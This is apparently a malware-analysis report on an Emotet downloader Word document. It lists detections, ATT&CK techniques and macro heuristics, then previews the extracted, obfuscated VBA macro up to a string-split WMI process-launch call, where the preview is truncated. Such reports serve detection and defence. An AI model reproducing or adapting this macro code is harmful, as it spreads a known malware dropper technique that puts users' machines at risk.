MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains multiple indicators of malicious macro execution, including legacy WordBasic auto-exec markers, an AutoOpen VBA macro, and a GetObject call, all strongly suggesting the execution of embedded code. ClamAV detection as 'Doc.Downloader.Emotet-6864615-0' further supports this, indicating the file's purpose is to download and execute a secondary payload. The presence of VBA macros and the Emotet family attribution point towards a common phishing attachment delivery vector.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6864615-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6864615-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73317 bytes |
SHA-256: 704af98808f5a79e1c242d582176ace8c0bd3c5d625d6caecc8bd95114553136 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "n087__81"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "l8498_"
Function T_58451()
J0333066 = 165732467 - 84652675
E1_28_ = 341336524 + f_0_299
Select Case w60605
Case 972385022
q7345201 = Chr(624482569 * Tan(w24079_))
E2_223 = l582228
Case 269909015
X842___ = J1_2673_
D2342553 = z06337_1
Case 981982878
O1508_42 = 624919321
o845553 = o63_70__
End Select
c11__2_2 = 335302691 - 163767063
a_333_2 = 752066423 + Q_5_185
Select Case O7___552
Case 728235867
F24_46 = Chr(428667804 * Tan(S3302_48))
O_4591 = U___5_
Case 950356694
a60020 = G53011_
d7__0_9 = p19_40
Case 725046007
F36321_7 = 711249076
T_17057 = r9262_3
End Select
w594__25 = 288704408 - 610200261
v042_279 = 663037056 + w_64_5
Select Case H4627_
Case 910985547
I381___ = Chr(898789535 * Tan(o06722))
Y6961986 = i_3_4_6
Case 489408960
K_96_4 = m_51647
n3_85755 = v7719__7
Case 634332277
h_0209 = 206569062
v70_057 = S51951_4
End Select
t638381 = 862278573 - 505579941
C87___ = 735337498 + N2_6_5_4
Select Case t86278
Case 928021334
m72___70 = Chr(861348596 * Tan(i7993_7))
t0__57_0 = S___7526
Case 910432846
h15976_ = j136_206
F_3_98_ = Q16946
Case 230400240
E_1__85 = 335104513
w60_167 = H029__7
End Select
G4__55 = 305226670 - 244983474
E95_25_ = 160350089 + O01__6_3
Select Case j_10_3
Case 314938330
F30_60 = Chr(8566119 * Tan(w_1901_))
w__824 = G803_1__
Case 811370710
k04_464 = C4_04_
N817_0 = V3__40_
Case 303917444
c0103_1_ = 650365981
w_10004 = r__7_3
End Select
T7_249 = 847119990 - 705658037
P8___3__ = 856104116 + z_0_61
Select Case t62570__
Case 869250915
n5_60111 = Chr(235842181 * Tan(c1_26922))
O__5344 = X1719__7
Case 992062415
w533_16 = J0_847
B7___5 = C1556323
Case 492833419
f872____ = 788258737
m34_7828 = p7_122
End Select
R_8219 = 149600281 - 549551068
R2__5_ = 106903657 + m9_7158
Select Case F_5___6
Case 266598414
C138___8 = Chr(141465764 * Tan(N0875978))
c4872_95 = D943791
Case 965999343
m600_3 = X4__01
i2__2414 = W6_088_
Case 163002022
a_9_25 = 870513954
Q_3001_ = J857_3_7
End Select
End Function
Function z_376_60(o5407_40, U_8155_7)
On Error Resume Next
w32_493 = 53167550 - 519478825
T5___29 = 870167159 + G3_56172
Select Case p06354_
Case 449068510
t036125_ = Chr(118122534 * Tan(F80_138_))
v99_0_89 = I_017_
Case 605775791
j01__0 = U416881_
b54_28_ = s952849
Case 899183990
q_293258 = 804588310
i1762_ = i7_55431
End Select
f057961 = 583149826 - 654559089
Q78893_ = 982340265 + h__1846_
Select Case k4115_
Case 82134585
w02772_8 = Chr(24314109 * Tan(L_____))
D2901__ = b402_29
Case 98842661
X___655 = W31970__
G7_16___ = q3_74_8
Case 344219010
U03_04 = 463832953
X_6536 = v5_9625_
End Select
Set h22227 = GetObject((Q820628 + "win" + o52820 + "mgm" + W_92559_) + (w8_16__ + "ts:Win" + Q2149_0_) + "32_Proce" + "ssStartup")
f_90__ = 921341036 - 49934387
R5_8_865 = 649702550 + z44780
Select Case u12736
Case 772081429
Y668441 = Chr(51375532 * Tan(a96062))
n54330_ = K_023___
Case 281035449
j_46_7_ =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.